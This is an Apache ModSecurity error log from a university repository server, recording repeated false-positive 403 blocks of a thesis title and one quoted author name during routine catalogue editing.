[Mon Aug 28 09:40:33.519940 2023] [:error] [pid 39660] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwJIcCo-f0AAJrsfRkAAAAD"]
[Mon Aug 28 09:40:34.366324 2023] [:error] [pid 39660] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwJIsCo-f0AAJrsfRoAAAAD"]
[Mon Aug 28 09:41:12.694856 2023] [:error] [pid 39676] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwJSMCo-f0AAJr80WMAAAAf"]
[Mon Aug 28 09:41:13.667402 2023] [:error] [pid 39676] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwJScCo-f0AAJr80WQAAAAf"]
[Mon Aug 28 09:41:13.835307 2023] [:error] [pid 39676] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwJScCo-f0AAJr80WUAAAAf"]
[Mon Aug 28 09:41:14.021076 2023] [:error] [pid 39676] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwJSsCo-f0AAJr80WYAAAAf"]
[Mon Aug 28 09:41:14.211575 2023] [:error] [pid 39676] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwJSsCo-f0AAJr80WcAAAAf"]
[Mon Aug 28 09:43:17.163447 2023] [:error] [pid 39566] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwJxcCo-f0AAJqOC2oAAAAJ"]
[Mon Aug 28 09:43:18.979966 2023] [:error] [pid 39566] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwJxsCo-f0AAJqOC2sAAAAJ"]
[Mon Aug 28 09:43:32.029080 2023] [:error] [pid 39717] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwJ1MCo-f0AAJsl3dIAAAAH"]
[Mon Aug 28 09:43:32.770643 2023] [:error] [pid 39717] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwJ1MCo-f0AAJsl3dMAAAAH"]
[Mon Aug 28 09:43:33.466666 2023] [:error] [pid 39717] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwJ1cCo-f0AAJsl3dQAAAAH"]
[Mon Aug 28 09:43:33.825189 2023] [:error] [pid 39717] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwJ1cCo-f0AAJsl3dUAAAAH"]
[Mon Aug 28 09:43:34.017673 2023] [:error] [pid 39717] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwJ1sCo-f0AAJsl3dYAAAAH"]
[Mon Aug 28 09:44:46.566756 2023] [:error] [pid 39717] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwKHsCo-f0AAJsl3eoAAAAH"]
[Mon Aug 28 09:44:47.288606 2023] [:error] [pid 39717] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwKH8Co-f0AAJsl3esAAAAH"]
[Mon Aug 28 09:47:39.457469 2023] [:error] [pid 39803] [client 47.128.19.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Yin, Shuya\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwKy8Co-f0AAJt7gkoAAAAW"]
[Mon Aug 28 09:49:52.946700 2023] [:error] [pid 39813] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwLUMCo-f0AAJuFIyEAAAAE"]
[Mon Aug 28 09:49:54.380809 2023] [:error] [pid 39813] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwLUsCo-f0AAJuFIyIAAAAE"]
[Mon Aug 28 09:49:54.591564 2023] [:error] [pid 39813] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwLUsCo-f0AAJuFIyMAAAAE"]
[Mon Aug 28 09:49:55.144995 2023] [:error] [pid 39813] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwLU8Co-f0AAJuFIyQAAAAE"]
[Mon Aug 28 09:49:55.335469 2023] [:error] [pid 39813] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwLU8Co-f0AAJuFIyUAAAAE"]
[Mon Aug 28 09:49:55.531274 2023] [:error] [pid 39813] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwLU8Co-f0AAJuFIyYAAAAE"]
[Mon Aug 28 09:49:55.695151 2023] [:error] [pid 39813] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwLU8Co-f0AAJuFIycAAAAE"]
[Mon Aug 28 09:49:55.872171 2023] [:error] [pid 39813] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwLU8Co-f0AAJuFIygAAAAE"]
[Mon Aug 28 09:49:56.527555 2023] [:error] [pid 39813] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwLVMCo-f0AAJuFIykAAAAE"]
[Mon Aug 28 09:49:56.702666 2023] [:error] [pid 39813] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwLVMCo-f0AAJuFIyoAAAAE"]
[Mon Aug 28 09:49:56.887180 2023] [:error] [pid 39813] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwLVMCo-f0AAJuFIysAAAAE"]
[Mon Aug 28 09:49:57.071239 2023] [:error] [pid 39813] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwLVcCo-f0AAJuFIywAAAAE"]
[Mon Aug 28 09:49:57.239503 2023] [:error] [pid 39813] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwLVcCo-f0AAJuFIy0AAAAE"]
[Mon Aug 28 09:49:57.430389 2023] [:error] [pid 39813] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwLVcCo-f0AAJuFIy4AAAAE"]
[Mon Aug 28 09:49:57.591140 2023] [:error] [pid 39813] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwLVcCo-f0AAJuFIy8AAAAE"]
